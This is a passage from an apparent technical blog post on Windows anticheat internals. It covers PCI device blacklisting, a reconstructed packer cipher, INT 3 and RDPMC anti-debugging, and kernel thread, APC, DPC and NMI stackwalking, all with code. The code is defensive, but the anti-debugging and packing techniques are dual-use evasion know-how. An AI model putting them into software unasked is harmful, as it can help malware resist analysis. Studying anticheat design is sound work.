    IO_STATUS_BLOCK    io     = {<span class="hljs-number">0</span>};
    PIRP               irp    = <span class="hljs-literal">NULL</span>;
    PIO_STACK_LOCATION packet = <span class="hljs-literal">NULL</span>;

    <span class="hljs-keyword">if</span> (BufferLength == <span class="hljs-number">0</span>)
        <span class="hljs-keyword">return</span> STATUS_BUFFER_TOO_SMALL;

    KeInitializeEvent(&amp;event, NotificationEvent, FALSE);

    <span class="hljs-comment">/*
     * we dont need to free this IRP as the IO manager will free it when the
     * request is completed
     */</span>
    irp = IoBuildSynchronousFsdRequest(
        IRP_MJ_PNP, DeviceObject, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>, &amp;event, &amp;io);

    <span class="hljs-keyword">if</span> (!irp) {
        DEBUG_ERROR(<span class="hljs-string">"IoBuildSynchronousFsdRequest failed with no status."</span>);
        <span class="hljs-keyword">return</span> STATUS_INSUFFICIENT_RESOURCES;
    }

    packet                = IoGetNextIrpStackLocation(irp);
    packet-&gt;MinorFunction = IRP_MN_READ_CONFIG;
    packet-&gt;Parameters.ReadWriteConfig.WhichSpace = PCI_WHICHSPACE_CONFIG;
    packet-&gt;Parameters.ReadWriteConfig.Offset     = Offset;
    packet-&gt;Parameters.ReadWriteConfig.Buffer     = Buffer;
    packet-&gt;Parameters.ReadWriteConfig.Length     = BufferLength;

    status = IoCallDriver(DeviceObject, irp);

    <span class="hljs-keyword">if</span> (status == STATUS_PENDING) {
        KeWaitForSingleObject(&amp;event, Executive, KernelMode, FALSE, <span class="hljs-literal">NULL</span>);
        status = io.Status;
    }

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
        DEBUG_ERROR(<span class="hljs-string">"Failed to read configuration space with status %x"</span>,
                    status);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>Once the configuration space is read, we can check if the device ID is among the flagged IDs. If the device ID matches any of the flagged IDs, we can report the blacklisted device.</p>
<pre><code class="lang-c"><span class="hljs-function">BOOLEAN
<span class="hljs-title">IsPciConfigurationSpaceFlagged</span><span class="hljs-params">(_In_ PPCI_COMMON_HEADER Configuration)</span>
</span>{
    <span class="hljs-keyword">for</span> (UINT32 index = <span class="hljs-number">0</span>; index &lt; FLAGGED_DEVICE_ID_COUNT; index++) {
        <span class="hljs-keyword">if</span> (Configuration-&gt;DeviceID == FLAGGED_DEVICE_IDS[index])
            <span class="hljs-keyword">return</span> TRUE;
    }

    <span class="hljs-keyword">return</span> FALSE;
}
</code></pre>
<h1 id="heading-game-binary-and-driver-protection">Game Binary and Driver Protection</h1>
<p>One of the primary concern for both EDR and anticheat developers is the protection of its binary and processes. While EDRs sometimes fall back on protections given to them through the MVI program, anticheat providers need to think of more creative solutions on how to ward off static and dynamic analysis.</p>
<p>Usually anticheats don't operate alone, but alongside an antitamper solution. They also sometimes have really good ASCII art games, like this one from Packman, an antitamper for Vanguard Anticheat.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718800446008/4acff5ab-4dc0-4726-bfcb-3174395fbbde.png" alt class="image--center mx-auto" /></p>
<p>But Byfron's Hyperion, the antitamper for EasyAntiCheat in Roblox, is definitely winning brownie points from me for (to my knowledge) the first implementation of <a target="_blank" href="https://github.com/xoreaxeaxeax/REpsych">REpsych</a> on production software.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718800262856/7a5e8e78-a3cc-4053-a58b-9c86ac7c2858.png" alt="Byfron Hyperion" class="image--center mx-auto" /></p>
<p>But what are the protections these antitamper systems give?</p>
<h2 id="heading-binary-packing">Binary Packing</h2>
<p>Binary packing is the technique of encrypting executable files and binaries to obscure their content, making it harder to detect or analyze them statically. Ideally in games, you only authorized processes can access and modify the game assets, thereby protecting the game's integrity.</p>
<p>But encrypting/decrypting game assets and binaries can have severe impacts to performance as some <a target="_blank" href="https://www.youtube.com/watch?v=mcyOJ4Dxs7E">DRM providers</a> would like you to not believe. While there are many <a target="_blank" href="https://www.reddit.com/r/pcgaming/comments/15ud3zf/can_someone_explain_to_me_what_is_vmprotect/">packers on the market today</a>, they are often very performance heavy and offer little control to improve performance in graphics-heavy applications.</p>
<p>For the aforementioned packman, Riot Games somewhat explain how it works <a target="_blank" href="https://technology.riotgames.com/news/riots-approach-anti-cheat">here</a>. The code below is not an exact replica of the solution, but more of what i think a solution looks like. Mind you this solution is based on incomplete information from their blogpost and likely doesn't work anymore.</p>
<p>The encryption process starts by initializing an initial structure, which holds the cipher state for each decryption event. Then we initialize this key using a randomly generated seed value.</p>
<pre><code class="lang-c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">GKey</span> {</span>
    <span class="hljs-keyword">uint8_t</span> key[<span class="hljs-number">0x100</span>];
    <span class="hljs-keyword">uint8_t</span> count;
    <span class="hljs-keyword">uint8_t</span> hold;
};

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">SpawnKey</span><span class="hljs-params">(GKey* gk, <span class="hljs-keyword">const</span> <span class="hljs-keyword">uint8_t</span>* seed, <span class="hljs-keyword">size_t</span> len)</span> </span>{
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">0x100</span>; i++) {
        gk-&gt;key[i] = i;
    }
    <span class="hljs-keyword">uint8_t</span> h = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">0x100</span>; i++) {
        <span class="hljs-keyword">uint8_t</span> j = gk-&gt;key[i];
        h += seed[i % len] + j;
        gk-&gt;key[i] = gk-&gt;key[h];
        gk-&gt;key[h] = j;
    }
}
</code></pre>
<p>The encryption routine uses an initialized key to encrypt the data and the same function is used for both encryption and decryption due to the symmetry of the XOR operation. Each byte of the input data is encrypted by modifying the <code>count</code> and <code>hold</code> counters and performing a series of swaps and XOR operations.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">Encrypt</span><span class="hljs-params">(GKey* gk, <span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span>* in, <span class="hljs-keyword">void</span>* out, <span class="hljs-keyword">size_t</span> len)</span> </span>{
    <span class="hljs-keyword">uint8_t</span> t1, t2;
    <span class="hljs-keyword">uint8_t</span> j;
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint32_t</span> i = <span class="hljs-number">0</span>; i &lt; len; i++) {
        gk-&gt;count++;
        j = gk-&gt;count;
        gk-&gt;hold += gk-&gt;key[j];
        t1 = gk-&gt;key[j];
        t2 = gk-&gt;key[gk-&gt;hold];
        gk-&gt;key[j] = t2;
        gk-&gt;key[gk-&gt;hold] = t1;
        t1 += t2;
        ((<span class="hljs-keyword">uint8_t</span>*)out)[i] = ((<span class="hljs-keyword">uint8_t</span>*)in)[i] ^ gk-&gt;key[t1];
    }
}
</code></pre>
<p>When the game client is executed, the .text section of the executable file needs to be decrypted. The decryption routine involves re-initializing the key and decrypting the data in stages, starting with the primary seed.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">Decrypt</span><span class="hljs-params">(GKey* gk, <span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span>* in, <span class="hljs-keyword">void</span>* out, <span class="hljs-keyword">size_t</span> len)</span> </span>{
    <span class="hljs-keyword">uint8_t</span> t1, t2;
    <span class="hljs-keyword">uint8_t</span> j;
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint32_t</span> i = <span class="hljs-number">0</span>; i &lt; len; i++) {
        gk-&gt;count++;
        j = gk-&gt;count;
        gk-&gt;hold += gk-&gt;key[j];
        t1 = gk-&gt;key[j];
        t2 = gk-&gt;key[gk-&gt;hold];
        gk-&gt;key[j] = t2;
        gk-&gt;key[gk-&gt;hold] = t1;
        t1 += t2;
        ((<span class="hljs-keyword">uint8_t</span>*)out)[i] = ((<span class="hljs-keyword">uint8_t</span>*)in)[i] ^ gk-&gt;key[t1];
    }
}
</code></pre>
<p>Riot Games overcame the limitations of traditional stub code injection by using an external library for unpacking. This method allows for validating game dependencies before they are loaded, ensuring the integrity of the game’s libraries. The process involves modifying the game’s import descriptors to list only their custom library, which loads first and validates other dependencies.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Pointers to the 'real' Import Table and array of name lengths</span>
IMAGE_IMPORT_DESCRIPTOR* import_descriptor_ptr = (IMAGE_IMPORT_DESCRIPTOR*)(league + <span class="hljs-number">0x13D4B10</span>);
<span class="hljs-keyword">uint32_t</span>* import_name_len_ptr = (<span class="hljs-keyword">uint32_t</span>*)(stub + <span class="hljs-number">0xBF5C8</span>);

<span class="hljs-comment">// Decrypt and validate the imports</span>
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">0x13</span>; i++) {
    Decrypt(&amp;gk, import_descriptor_ptr, import_descriptor_ptr, <span class="hljs-number">0x14</span>);
    <span class="hljs-keyword">size_t</span> len = *import_name_len_ptr;
    <span class="hljs-keyword">uint8_t</span>* name_ptr = league + import_descriptor_ptr-&gt;name_rva;
    Decrypt(&amp;gk, name_ptr, name_ptr, len);
    <span class="hljs-comment">// Validate and load libraries</span>
    import_descriptor_ptr++;
    import_name_len_ptr++;
}
</code></pre>
<p>The .text section is decrypted in pages, allowing for non-sequential decryption. Each 4096-byte page is decrypted independently using a unique key derived from the primary seed, ensuring the security of the game code during execution.</p>
<pre><code class="lang-c"><span class="hljs-keyword">uint32_t</span> num_pages = ltext_len / <span class="hljs-number">0x1000</span>;
<span class="hljs-keyword">for</span> (<span class="hljs-keyword">uint32_t</span> i = <span class="hljs-number">1</span>; i &lt;= num_pages; i++) {
    <span class="hljs-built_in">memset</span>(&amp;gk, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(GKey));
    <span class="hljs-keyword">uint8_t</span>* seed = decrypt2_seed + ((i % <span class="hljs-number">0x53</span>) * decrypt2_seed_len);
    <span class="hljs-keyword">uint8_t</span>* text = league + (i * <span class="hljs-number">0x1000</span>);
    SpawnKey(&amp;gk, seed, decrypt2_seed_len);
    Decrypt(&amp;gk, text, text, <span class="hljs-number">0x1000</span>);
}
</code></pre>
<h2 id="heading-anti-debugging">Anti-Debugging</h2>
<p>While static analysis can be thwarted easily, the use of dynamic analysis tools present a more complicated challenge. Anti-debugging techniques in anti-cheat systems are designed to detect and counteract these tools.</p>
<p>Windows itself has built in protections against debuggers such as the <code>IsDebuggerPresent</code> and <code>CheckRemoteDebuggerPresent</code> function, which checks the <code>PEB</code> (Process Environment Block) of the calling process. The <code>PEB</code> contains a flag named <code>BeingDebugged</code>, which is set to <code>1</code> if a debugger is attached. The problem with these solutions is that they are easily circumvented by patching the flags. This can be done directly sometimes if you use OllyDbg or x32/64dbg as a debugger, with plugins such as <a target="_blank" href="https://github.com/x64dbg/ScyllaHide">ScyllaHide</a>.</p>
<p>This is why many packers protect binaries from debuggers using some more interesting methods, one of them being the use of <code>INT 3</code>. The <code>INT 3</code> instruction is a single-byte opcode (<code>0xCC</code>) designed to signal a breakpoint. When the CPU encounters this instruction, it generates an <code>EXCEPTION_BREAKPOINT</code>, which is a specific type of interrupt that transfers control to an exception handler. In the context of Windows, the exception handler is part of the system's structured exception handling (SEH) mechanism.</p>
<pre><code class="lang-c"><span class="hljs-keyword">bool</span> g_bDebugged = <span class="hljs-literal">false</span>;

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">filter</span><span class="hljs-params">(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> code, struct _EXCEPTION_POINTERS *ep)</span>
</span>{
    g_bDebugged = code != EXCEPTION_BREAKPOINT;
    <span class="hljs-keyword">return</span> EXCEPTION_EXECUTE_HANDLER;
}

<span class="hljs-function"><span class="hljs-keyword">bool</span> <span class="hljs-title">IsDebugged</span><span class="hljs-params">()</span>
</span>{
    __try
    {
        __asm __emit(<span class="hljs-number">0xCD</span>);
        __asm __emit(<span class="hljs-number">0x03</span>);
    }
    __except (filter(GetExceptionCode(), GetExceptionInformation()))
    {
        <span class="hljs-keyword">return</span> g_bDebugged;
    }
}
</code></pre>
<p>When the <code>EXCEPTION_BREAKPOINT</code> occurs, Windows adjusts the Instruction Pointer (EIP) to point to the address of the <code>0xCC</code> opcode. This adjustment is crucial for the debugger to handle the breakpoint correctly. The EIP is decremented by one to point to the <code>0xCC</code> instruction, allowing the debugger to recognize and process the breakpoint instruction.</p>
<p>When a process is being traced in a debugger, the inherent delays introduced between instructions and their execution can be significant. Detecting these delays can also help in identifying the presence of a debugger. For this purpose, we can use the <code>RDPMC</code> instruction to read the performance monitoring counters of the processor.</p>
<p>These counters keep track of various events such as the number of instructions executed, cache misses, and more. The usage of <code>RDPMC</code> requires the PCE (Performance-Monitoring Counter Enable) flag to be set in the CR4 register, which typically limits its usage to kernel mode.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">bool</span> <span class="hljs-title">IsDebugged</span><span class="hljs-params">(DWORD64 qwNativeElapsed)</span>
</span>{
    ULARGE_INTEGER Start, End;
    __asm
    {
        <span class="hljs-keyword">xor</span>  ecx, ecx    <span class="hljs-comment">// Select performance counter 0</span>
        rdpmc            <span class="hljs-comment">// Read performance counter</span>
        mov  Start.LowPart, eax
        mov  Start.HighPart, edx
    }

    <span class="hljs-comment">// ... some work ...</span>

    __asm
    {
        <span class="hljs-keyword">xor</span>  ecx, ecx    <span class="hljs-comment">// Select performance counter 0</span>
        rdpmc            <span class="hljs-comment">// Read performance counter</span>
        mov  End.LowPart, eax
        mov  End.HighPart, edx
    }

    <span class="hljs-keyword">return</span> (End.QuadPart - Start.QuadPart) &gt; qwNativeElapsed;
}
</code></pre>
<p><code>RDPMC</code> is used to read the performance counter before and after executing some work. By comparing the difference with a predefined threshold, we can detect if a debugger or VM is slowing down execution.</p>
<h1 id="heading-telemetry-amp-defenses-in-anticheats">Telemetry &amp; Defenses in Anticheats</h1>
<p>Telemetry is important to detect certain behaviors that is closely linked to cheating. This is where the approach of detection differs to EDRs which mainly line of <a target="_blank" href="https://docs.google.com/spreadsheets/d/1ZMFrD6F6tvPtf_8McC-kWrNBBec_6Si3NW6AoWf3Kbg/edit?gid=1993314609#gid=1993314609">telemetry</a> is through OS-provided event streams like <a target="_blank" href="https://research.meekolab.com/introduction-into-microsoft-threat-intelligence-drivers-etw-ti">Microsoft Threat Intelligence Drivers (ETW-TI)</a> which is locked behind the Microsoft MVI program. Anticheats do not have access to these event streams. EDRs are also protected using things like Early Launch Anti Malware (ELAM) drivers and Process Protection Light (PPL), which are also locked behind the MVI program.</p>
<h2 id="heading-attached-thread-detection">Attached Thread Detection</h2>
<p>Attached thread detection is a technique used to identify and monitor threads that are injected into a process. This process is crucial for anti-cheat systems, as it allows the detection of unauthorized threads that might be used to read or modify game memory, disrupt normal operations, or execute arbitrary code within the game's process space.</p>
<p>In the Windows operating system, threads can be created within a process using various methods, including <code>CreateRemoteThread</code>, <code>NtCreateThreadEx</code>, or through DLL injection. By monitoring these threads, one can identify and potentially prevent malicious activities.</p>
<p>To start, the driver sets up a notification routine for thread creation using the <code>PsSetCreateThreadNotifyRoutine</code> API. This routine gets called whenever a new thread is created in the system.</p>
<pre><code class="lang-cpp"><span class="hljs-function">NTSTATUS <span class="hljs-title">DriverEntry</span><span class="hljs-params">(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)</span>
</span>{
    NTSTATUS status;
    DriverObject-&gt;DriverUnload = DriverUnload;

    status = PsSetCreateThreadNotifyRoutine(ThreadCreateNotifyRoutine);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status))
    {
        DbgPrint(<span class="hljs-string">"Failed to set thread creation notify routine\n"</span>);
        <span class="hljs-keyword">return</span> status;
    }

    DbgPrint(<span class="hljs-string">"Driver loaded successfully\n"</span>);
    <span class="hljs-keyword">return</span> STATUS_SUCCESS;
}
</code></pre>
<p><code>PsSetCreateThreadNotifyRoutine</code> registers <code>ThreadCreateNotifyRoutine</code> as the callback function that will be invoked whenever a thread is created. The <code>DriverUnload</code> function ensures that this callback is properly removed when the driver is unloaded.</p>
<p>When a new thread is created, the <code>ThreadCreateNotifyRoutine</code> function is called. This function retrieves the thread object using <code>PsLookupThreadByThreadId</code> and then validates the thread's context.</p>
<pre><code class="lang-cpp"><span class="hljs-function">VOID <span class="hljs-title">ThreadCreateNotifyRoutine</span><span class="hljs-params">(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create)</span>
</span>{
    <span class="hljs-keyword">if</span> (Create)
    {
        PETHREAD Thread;
        NTSTATUS status = PsLookupThreadByThreadId(ThreadId, &amp;Thread);
        <span class="hljs-keyword">if</span> (NT_SUCCESS(status))
        {
            <span class="hljs-keyword">if</span> (!ValidateThreadContext(Thread))
            {
                DbgPrint(<span class="hljs-string">"Unauthorized thread detected in process %d\n"</span>, ProcessId);
            }
            ObDereferenceObject(Thread);
        }
    }
}
</code></pre>
<p>In the <code>ThreadCreateNotifyRoutine</code>, when a thread is created (<code>Create</code> is <code>TRUE</code>), the function looks up the thread object using <code>PsLookupThreadByThreadId</code>. Once the thread object is retrieved, it is passed to the <code>ValidateThreadContext</code> function to determine if the thread is legitimate.</p>
<p>The <code>ValidateThreadContext</code> function performs a basic check to see if the thread's starting address falls within a known valid range for the process. Real-world implementations would involve more complex checks, but this is just a lazy example.</p>
<pre><code class="lang-cpp"><span class="hljs-function">BOOLEAN <span class="hljs-title">ValidateThreadContext</span><span class="hljs-params">(PETHREAD Thread)</span>
</span>{
    PVOID StartAddress = PsGetThreadStartAddress(Thread);
    PEPROCESS Process = IoThreadToProcess(Thread);
    PVOID BaseAddress = PsGetProcessSectionBaseAddress(Process);

    <span class="hljs-keyword">if</span> ((ULONG_PTR)StartAddress &gt;= (ULONG_PTR)BaseAddress &amp;&amp;
        (ULONG_PTR)StartAddress &lt; (ULONG_PTR)BaseAddress + <span class="hljs-number">0x1000000</span>) <span class="hljs-comment">// 16 MB range</span>
    {
        <span class="hljs-keyword">return</span> TRUE;
    }

    <span class="hljs-keyword">return</span> FALSE;
}
</code></pre>
<p><code>ValidateThreadContext</code> retrieves the thread's start address using <code>PsGetThreadStartAddress</code> and compares it with the base address of the process obtained through <code>PsGetProcessSectionBaseAddress</code>. If the start address falls within a 16 MB range of the base address, the thread is considered valid. Otherwise, it is flagged as potentially unauthorized.</p>
<p>This approach allows the detection of threads that do not originate from the expected code regions within the process, which is a common characteristic of threads injected by malicious actors. By integrating this detection mechanism into a kernel-mode driver, anti-cheat systems can effectively monitor and respond to unauthorized thread creation, thereby enhancing the security and integrity of the game.</p>
<h2 id="heading-dpcapc-stackwalking">DPC/APC Stackwalking</h2>
<p>Stack walking via Asynchronous Procedure Calls (APC) and Deferred Procedure Calls (DPC) is an essential technique for identifying potentially malicious activities. Both APC and DPC are mechanisms that execute code asynchronously in the context of a particular thread, but they operate differently and serve different purposes within the Windows operating system.</p>
<p>APC stack walking via <code>RtlCaptureStackBackTrace</code> is used to capture the call stack of a thread at a specific point in time when an APC is executed. APCs are designed to allow user-mode applications and kernel-mode drivers to execute code in the context of a specific thread. They are commonly used for asynchronous I/O operations and other delayed execution tasks.</p>
<p>To implement APC stack walking, the driver can set an APC to be executed in the context of a thread and then use <code>RtlCaptureStackBackTrace</code> to capture the call stack. This allows the driver to examine the sequence of function calls that led to the execution of the APC and identify any suspicious or unauthorized code execution paths.</p>
<pre><code class="lang-cpp"><span class="hljs-function">VOID <span class="hljs-title">APCFunction</span><span class="hljs-params">(KAPC *Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *NormalContext,
                 PVOID *SystemArgument1, PVOID *SystemArgument2)</span>
</span>{
    UNREFERENCED_PARAMETER(Apc);
    UNREFERENCED_PARAMETER(NormalRoutine);
    UNREFERENCED_PARAMETER(NormalContext);
    UNREFERENCED_PARAMETER(SystemArgument1);
    UNREFERENCED_PARAMETER(SystemArgument2);

    ULONG framesToCapture = <span class="hljs-number">10</span>;
    PVOID stackBackTrace[<span class="hljs-number">10</span>];
    ULONG capturedFrames = RtlCaptureStackBackTrace(<span class="hljs-number">0</span>, framesToCapture, stackBackTrace, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">for</span> (ULONG i = <span class="hljs-number">0</span>; i &lt; capturedFrames; i++)
    {
        DbgPrint(<span class="hljs-string">"APC Stack Frame[%d]: %p\n"</span>, i, stackBackTrace[i]);
    }
}

<span class="hljs-function">VOID <span class="hljs-title">SetAPC</span><span class="hljs-params">(PETHREAD Thread)</span>
</span>{
    PKAPC apc = (PKAPC)ExAllocatePool(NonPagedPool, <span class="hljs-keyword">sizeof</span>(KAPC));
    <span class="hljs-keyword">if</span> (apc)
    {
        KeInitializeApc(apc, Thread, OriginalApcEnvironment, APCFunction, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, KernelMode, <span class="hljs-literal">NULL</span>);
        KeInsertQueueApc(apc, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>);
    }
}
</code></pre>
<p>In this example, <code>APCFunction</code> is the APC routine that captures the stack trace using <code>RtlCaptureStackBackTrace</code> and prints the captured stack frames. The <code>SetAPC</code> function initializes and inserts the APC into the queue of the specified thread.</p>
<p>DPC stack walking via <code>RtlCaptureStackBackTrace</code> operates similarly but is used for Deferred Procedure Calls. DPCs are designed to handle high-priority tasks that need to be executed promptly but at a lower priority than interrupt service routines (ISRs). They are commonly used for deferred processing of I/O operations and other time-sensitive tasks that do not require immediate execution in the context of an interrupt.</p>
<p>To capture the stack trace during a DPC execution, the driver can set up a DPC and use <code>RtlCaptureStackBackTrace</code> in the DPC routine to examine the call stack. This allows the driver to analyze the sequence of function calls that led to the DPC execution and detect any anomalies.</p>
<pre><code class="lang-cpp"><span class="hljs-function">VOID <span class="hljs-title">DPCFunction</span><span class="hljs-params">(KDPC *Dpc, PVOID DeferredContext, PVOID SystemArgument1, PVOID SystemArgument2)</span>
</span>{
    UNREFERENCED_PARAMETER(Dpc);
    UNREFERENCED_PARAMETER(DeferredContext);
    UNREFERENCED_PARAMETER(SystemArgument1);
    UNREFERENCED_PARAMETER(SystemArgument2);

    ULONG framesToCapture = <span class="hljs-number">10</span>;
    PVOID stackBackTrace[<span class="hljs-number">10</span>];
    ULONG capturedFrames = RtlCaptureStackBackTrace(<span class="hljs-number">0</span>, framesToCapture, stackBackTrace, <span class="hljs-literal">NULL</span>);

    <span class="hljs-keyword">for</span> (ULONG i = <span class="hljs-number">0</span>; i &lt; capturedFrames; i++)
    {
        DbgPrint(<span class="hljs-string">"DPC Stack Frame[%d]: %p\n"</span>, i, stackBackTrace[i]);
    }
}

<span class="hljs-function">VOID <span class="hljs-title">ScheduleDPC</span><span class="hljs-params">()</span>
</span>{
    PKDPC dpc = (PKDPC)ExAllocatePool(NonPagedPool, <span class="hljs-keyword">sizeof</span>(KDPC));
    <span class="hljs-keyword">if</span> (dpc)
    {
        KeInitializeDpc(dpc, DPCFunction, <span class="hljs-literal">NULL</span>);
        KeInsertQueueDpc(dpc, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>);
    }
}
</code></pre>
<p>In this example, <code>DPCFunction</code> is the DPC routine that captures the stack trace using <code>RtlCaptureStackBackTrace</code> and prints the captured stack frames. The <code>ScheduleDPC</code> function initializes and inserts the DPC into the system DPC queue.</p>
<p>Comparing the two approaches, APC stack walking is performed in the context of a specific thread, which allows for a more granular inspection of thread-specific execution paths. This is particularly useful for detecting malicious code execution within user-mode threads or within the context of specific kernel-mode threads. On the other hand, DPC stack walking is performed in the context of system-wide deferred procedure calls, which are generally executed at a higher priority than normal thread execution. This makes DPC stack walking more suitable for detecting anomalies in high-priority, time-sensitive operations, such as those related to interrupt handling or critical I/O processing. Both approaches leverage <code>RtlCaptureStackBackTrace</code> to capture the call stack and provide valuable insights into the execution paths leading to APC or DPC execution.</p>
<h2 id="heading-nmi-stackwalking">NMI Stackwalking</h2>
<p>NMI (Non-Maskable Interrupt) stackwalking via ISR (Interrupt Service Routine) IRETQ involves a sequence of operations to validate the integrity of the system by inspecting the call stack during an NMI. This is achieved by handling NMIs and capturing the call stack through the interrupt service routine, ensuring no unauthorized modifications have been made to critical sections of the kernel.</p>
<p>When an NMI occurs, the <code>HandleNmiIOCTL</code> function is invoked to handle the interrupt. This function is responsible for setting up the necessary environment to capture the stack trace. The ISR for the NMI is designed to save the processor state, including the instruction pointer, stack pointer, and other critical registers, to ensure a reliable context for stackwalking.</p>
<p>The core function involved in NMI stackwalking dispatches a kernel APC (Asynchronous Procedure Call) to each CPU. This APC is used to walk the stack and capture the instruction pointers at each frame. The captured stack frames are then validated against known good regions of the code to detect any anomalies.</p>
<pre><code class="lang-c">HandleNmiIOCTL()
{
    PAGED_CODE();

    NTSTATUS       status  = STATUS_UNSUCCESSFUL;
    PVOID          handle  = <span class="hljs-literal">NULL</span>;
    SYSTEM_MODULES modules = {<span class="hljs-number">0</span>};
    PNMI_CONTEXT   context = <span class="hljs-literal">NULL</span>;

    UINT32 size = ImpKeQueryActiveProcessorCount(<span class="hljs-number">0</span>) * <span class="hljs-keyword">sizeof</span>(NMI_CONTEXT);

    <span class="hljs-keyword">if</span> (IsNmiInProgress())
        <span class="hljs-keyword">return</span> STATUS_ALREADY_COMMITTED;

    status = ValidateHalDispatchTables();
</code></pre>
<p>The <code>HandleNmiIOCTL</code> function prepares the system to handle an NMI, ensuring that all necessary resources are allocated and the environment is correctly configured. The actual stackwalking is performed by dispatching an APC to each CPU. The APC callback function captures the stack frames and validates them.</p>
<pre><code class="lang-c"><span class="hljs-function">NTSTATUS
<span class="hljs-title">DispatchStackwalkToEachCpuViaDpc</span><span class="hljs-params">()</span>
</span>{
    NTSTATUS       status  = STATUS_UNSUCCESSFUL;
    PDPC_CONTEXT   context = <span class="hljs-literal">NULL</span>;
    SYSTEM_MODULES modules = {<span class="hljs-number">0</span>};
    UINT32 size = ImpKeQueryActiveProcessorCount(<span class="hljs-number">0</span>) * <span class="hljs-keyword">sizeof</span>(DPC_CONTEXT);
    context = ImpExAllocatePool2(POOL_FLAG_NON_PAGED, size, POOL_TAG_DPC);
    <span class="hljs-keyword">if</span> (!context)
        <span class="hljs-keyword">return</span> STATUS_MEMORY_NOT_ALLOCATED;
    status = GetSystemModuleInformation(&amp;modules);
    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"GetSystemModuleInformation failed with status %x"</span>, status);
        <span class="hljs-keyword">goto</span> end;
    }
    ImpKeGenericCallDpc(DpcStackwalkCallbackRoutine, context);
    <span class="hljs-keyword">while</span> (!CheckForDpcCompletion(context))
        YieldProcessor();
    ValidateDpcCapturedStack(&amp;modules, context);
    DEBUG_VERBOSE(<span class="hljs-string">"Finished validating cores via dpc"</span>);
end:
    <span class="hljs-keyword">if</span> (modules.address)
        ImpExFreePoolWithTag(modules.address, SYSTEM_MODULES_POOL);
    <span class="hljs-keyword">if</span> (context)
        ImpExFreePoolWithTag(context, POOL_TAG_DPC);
    <span class="hljs-keyword">return</span> status;
}
</code></pre>
<p>In the context of an NMI, the ISR captures the processor state and obtaind the stack trace. This is typically done within the ISR or the APC callback. We can retrieve the interrupted instruction pointer (RIP) and stack pointer (RSP), ensuring that even at high interrupt levels, critical information can be captured without relying on potentially unsafe functions. We can then access the specific NMI context for the current processor core from the <code>Context</code> array. Several variables are initialized, including <code>kpcr</code> for the kernel processor control region, <code>tss</code> for the task state segment, and <code>machine_frame</code> for the interrupted machine state.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC BOOLEAN
<span class="hljs-title">NmiCallback</span><span class="hljs-params">(_Inout_opt_ PVOID Context, _In_ BOOLEAN Handled)</span>
</span>{
    UNREFERENCED_PARAMETER(Handled);

    ULONG                  core          = KeGetCurrentProcessorNumber();
    PNMI_CONTEXT           context       = &amp;((PNMI_CONTEXT)Context)[core];
    UINT64                 kpcr          = <span class="hljs-number">0</span>;
    TASK_STATE_SEGMENT_64* tss           = <span class="hljs-literal">NULL</span>;
    PMACHINE_FRAME         machine_frame = <span class="hljs-literal">NULL</span>;

    <span class="hljs-keyword">if</span> (!ARGUMENT_PRESENT(Context))
        <span class="hljs-keyword">return</span> TRUE;
    kpcr          = __readmsr(IA32_GS_BASE);
    tss           = GetTaskStateSegment(kpcr);
    machine_frame = GetIsrMachineFrame(tss);
</code></pre>
<p>To locate the IRETQ frame, which contains the interrupted instruction pointer (RIP), the function must find the top of the NMI ISR stack. This stack top is stored in the TSS (Task State Segment) at <code>TSS-&gt;Ist[3]</code>. The TSS itself can be obtained from the <code>KPCR-&gt;TSS_BASE</code>. After obtaining the TSS, the function reads the value at <code>TSS-&gt;Ist[3]</code>, which points to the top of the ISR stack, and then subtracts the size of the <code>MACHINE_FRAME</code> structure. This allows the function to read the interrupted RIP.</p>
<p>Using the <code>__readmsr</code> function, the <code>kpcr</code> is retrieved, which is the base address of the KPCR. The <code>GetTaskStateSegment</code> function is then called to obtain the TSS from the <code>kpcr</code>. Finally, the <code>GetIsrMachineFrame</code> function retrieves the machine frame from the TSS. We can then check if the interrupted RIP belongs to user mode using <code>IsUserModeAddress</code>. If it does, it sets the <code>user_thread</code> flag in the context to <code>TRUE</code>.</p>
<pre><code class="lang-c">    <span class="hljs-keyword">if</span> (IsUserModeAddress(machine_frame-&gt;rip))
        context-&gt;user_thread = TRUE;

    context-&gt;interrupted_rip = machine_frame-&gt;rip;
    context-&gt;interrupted_rsp = machine_frame-&gt;rsp;
